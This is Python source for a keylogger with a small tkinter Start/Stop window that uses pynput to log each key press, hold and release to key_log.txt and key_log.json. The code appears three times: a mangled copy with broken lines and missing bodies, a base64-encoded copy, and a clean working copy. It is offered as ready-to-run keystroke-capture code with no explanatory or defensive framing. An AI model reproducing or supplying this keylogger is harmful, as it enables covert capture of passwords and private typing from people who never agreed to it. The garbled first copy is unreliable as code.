import tkinter as tk
from tkinter import *
from pynput import keyboard
import json
keys_used = [];
flag = False;
keys = ""
def generate_text_log
(key): with open('key_log.txt', "w+") as keys:
def generate_json_file(keys_used):
with open('key_log.json', '+wb') as key_log:
key_list_bytes = json.dumps(keys_used).encode()
key_log.write(key_list_bytes)
global flag, keys_used, keys
if flag == False:
keys_used.append(
{'Pressed': f'{key}'}
)
flag = True
if flag == True:
keys_used.append(
{'Held': f'{key}'}
)
generate_json_file(keys_used)
global flag, keys_used, keys
keys_used.append(
{'Released': f'{key}'}
)
if flag == True:
flag = False
generate_json_file(keys_used)
generate_text_log(str(keys))
def start_keylogger():
global listener
listener = keyboard.Listener(on_press=on_press, on_release=on_release)
listener.start()
label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")
start_button.config(state='disabled')
stop_button.config(state='normal')
def stop_keylogger():
global listener
listener.stop()
label.config(text="Keylogger stopped.")
start_button.config(state='normal')
stop_button.config(state='disabled')
root = Tk()
root.title("Keylogger")
label = Label(root, text='Click "Start" to begin keylogging.')
label.config(anchor=CENTER)
start_button = Button(root, text="Start", command=start_keylogger)
start_button
.pack(side
=LEFT
)stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')
stop_button
.pack(side
=RIGHT
)root.geometry("250x250")
root.mainloop()
aW1wb3J0IHRraW50ZXIgYXMgdGsKZnJvbSB0a2ludGVyIGltcG9ydCAqCmZyb20gcHlucHV0IGltcG9ydCBrZXlib2FyZAppbXBvcnQganNvbgprZXlzX3VzZWQgPSBbXTsKZmxhZyA9IEZhbHNlOwprZXlzID0gJnF1b3Q7JnF1b3Q7CmRlZiBnZW5lcmF0ZV90ZXh0X2xvZyhrZXkpOgrCoCDCoCB3aXRoIG9wZW4oJiMzOTtrZXlfbG9nLnR4dCYjMzk7LCAmcXVvdDt3KyZxdW90OykgYXMga2V5czoKwqAgwqAgwqAga2V5cy53cml0ZShrZXkpCmRlZiBnZW5lcmF0ZV9qc29uX2ZpbGUoa2V5c191c2VkKToKwqAgwqAgd2l0aCBvcGVuKCYjMzk7a2V5X2xvZy5qc29uJiMzOTssICYjMzk7K3diJiMzOTspIGFzIGtleV9sb2c6CsKgIMKgIMKgIMKgIGtleV9saXN0X2J5dGVzID0ganNvbi5kdW1wcyhrZXlzX3VzZWQpLmVuY29kZSgpCsKgIMKgIMKgIMKgIGtleV9sb2cud3JpdGUoa2V5X2xpc3RfYnl0ZXMpCmRlZiBvbl9wcmVzcyhrZXkpOgrCoCDCoCBnbG9iYWwgZmxhZywga2V5c191c2VkLCBrZXlzCsKgIMKgIGlmIGZsYWcgPT0gRmFsc2U6CsKgIMKgICAgICBrZXlzX3VzZWQuYXBwZW5kKArCoCDCoCDCoCDCoCDCoCDCoCB7JiMzOTtQcmVzc2VkJiMzOTs6IGYmIzM5O3trZXl9JiMzOTt9CsKgIMKgIMKgIMKgICkKwqAgwqAgwqAgwqAgZmxhZyA9IFRydWUKwqAgwqAgaWYgZmxhZyA9PSBUcnVlOgrCoCDCoCDCoCDCoCBrZXlzX3VzZWQuYXBwZW5kKArCoCDCoCDCoCDCoCDCoCDCoCB7JiMzOTtIZWxkJiMzOTs6IGYmIzM5O3trZXl9JiMzOTt9CsKgIMKgIMKgIMKgICkKwqAgwqAgZ2VuZXJhdGVfanNvbl9maWxlKGtleXNfdXNlZCkKCmRlZiBvbl9yZWxlYXNlKGtleSk6CsKgIMKgIGdsb2JhbCBmbGFnLCBrZXlzX3VzZWQsIGtleXMKwqAgwqAga2V5c191c2VkLmFwcGVuZCgKwqAgwqAgwqAgwqAgeyYjMzk7UmVsZWFzZWQmIzM5OzogZiYjMzk7e2tleX0mIzM5O30KwqAgwqAgKQrCoCDCoCBpZiBmbGFnID09IFRydWU6CsKgIMKgIMKgIMKgIGZsYWcgPSBGYWxzZQrCoCDCoCBnZW5lcmF0ZV9qc29uX2ZpbGUoa2V5c191c2VkKQrCoCDCoCBrZXlzID0ga2V5cyArIHN0cihrZXkpCsKgIMKgIGdlbmVyYXRlX3RleHRfbG9nKHN0cihrZXlzKSkKZGVmIHN0YXJ0X2tleWxvZ2dlcigpOgrCoCDCoCBnbG9iYWwgbGlzdGVuZXIKwqAgwqAgbGlzdGVuZXIgPSBrZXlib2FyZC5MaXN0ZW5lcihvbl9wcmVzcz1vbl9wcmVzcywgb25fcmVsZWFzZT1vbl9yZWxlYXNlKQrCoCDCoCBsaXN0ZW5lci5zdGFydCgpCsKgIMKgIGxhYmVsLmNvbmZpZyh0ZXh0PSZxdW90O1srXSBLZXlsb2dnZXIgaXMgcnVubmluZyFcblshXSBTYXZpbmcgdGhlIGtleXMgaW4gJiMzOTtrZXlsb2dnZXIudHh0JiMzOTsmcXVvdDspCsKgIMKgIHN0YXJ0X2J1dHRvbi5jb25maWcoc3RhdGU9JiMzOTtkaXNhYmxlZCYjMzk7KQrCoCDCoCBzdG9wX2J1dHRvbi5jb25maWcoc3RhdGU9JiMzOTtub3JtYWwmIzM5OykKZGVmIHN0b3Bfa2V5bG9nZ2VyKCk6CsKgIMKgIGdsb2JhbCBsaXN0ZW5lcgrCoCDCoCBsaXN0ZW5lci5zdG9wKCkKwqAgwqAgbGFiZWwuY29uZmlnKHRleHQ9JnF1b3Q7S2V5bG9nZ2VyIHN0b3BwZWQuJnF1b3Q7KQrCoCDCoCBzdGFydF9idXR0b24uY29uZmlnKHN0YXRlPSYjMzk7bm9ybWFsJiMzOTspCsKgIMKgIHN0b3BfYnV0dG9uLmNvbmZpZyhzdGF0ZT0mIzM5O2Rpc2FibGVkJiMzOTspCnJvb3QgPSBUaygpCnJvb3QudGl0bGUoJnF1b3Q7S2V5bG9nZ2VyJnF1b3Q7KQpsYWJlbCA9IExhYmVsKHJvb3QsIHRleHQ9JiMzOTtDbGljayAmcXVvdDtTdGFydCZxdW90OyB0byBiZWdpbiBrZXlsb2dnaW5nLiYjMzk7KQpsYWJlbC5jb25maWcoYW5jaG9yPUNFTlRFUikKbGFiZWwucGFjaygpCnN0YXJ0X2J1dHRvbiA9IEJ1dHRvbihyb290LCB0ZXh0PSZxdW90O1N0YXJ0JnF1b3Q7LCBjb21tYW5kPXN0YXJ0X2tleWxvZ2dlcikKc3RhcnRfYnV0dG9uLnBhY2soc2lkZT1MRUZUKQpzdG9wX2J1dHRvbiA9IEJ1dHRvbihyb290LCB0ZXh0PSZxdW90O1N0b3AmcXVvdDssIGNvbW1hbmQ9c3RvcF9rZXlsb2dnZXIsIHN0YXRlPSYjMzk7ZGlzYWJsZWQmIzM5OykKc3RvcF9idXR0b24ucGFjayhzaWRlPVJJR0hUKQpyb290Lmdlb21ldHJ5KCZxdW90OzI1MHgyNTAmcXVvdDspCnJvb3QubWFpbmxvb3AoKQo=
import tkinter as tk
from tkinter import *
from pynput import keyboard
import json
keys_used = [];
flag = False;
keys = ""
def generate_text_log(key):
with open('key_log.txt', "w+") as keys:
keys.write(key)
def generate_json_file(keys_used):
with open('key_log.json', '+wb') as key_log:
key_list_bytes = json.dumps(keys_used).encode()
key_log.write(key_list_bytes)
def on_press(key):
global flag, keys_used, keys
if flag == False:
keys_used.append(
{'Pressed': f'{key}'}
)
flag = True
if flag == True:
keys_used.append(
{'Held': f'{key}'}
)
generate_json_file(keys_used)
def on_release(key):
global flag, keys_used, keys
keys_used.append(
{'Released': f'{key}'}
)
if flag == True:
flag = False
generate_json_file(keys_used)
keys = keys + str(key)
generate_text_log(str(keys))
def start_keylogger():
global listener
listener = keyboard.Listener(on_press=on_press, on_release=on_release)
listener.start()
label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")
start_button.config(state='disabled')
stop_button.config(state='normal')
def stop_keylogger():
global listener
listener.stop()
label.config(text="Keylogger stopped.")
start_button.config(state='normal')
stop_button.config(state='disabled')
root = Tk()
root.title("Keylogger")
label = Label(root, text='Click "Start" to begin keylogging.')
label.config(anchor=CENTER)
label.pack()
start_button = Button(root, text="Start", command=start_keylogger)
start_button.pack(side=LEFT)
stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')
stop_button.pack(side=RIGHT)
root.geometry("250x250")
root.mainloop()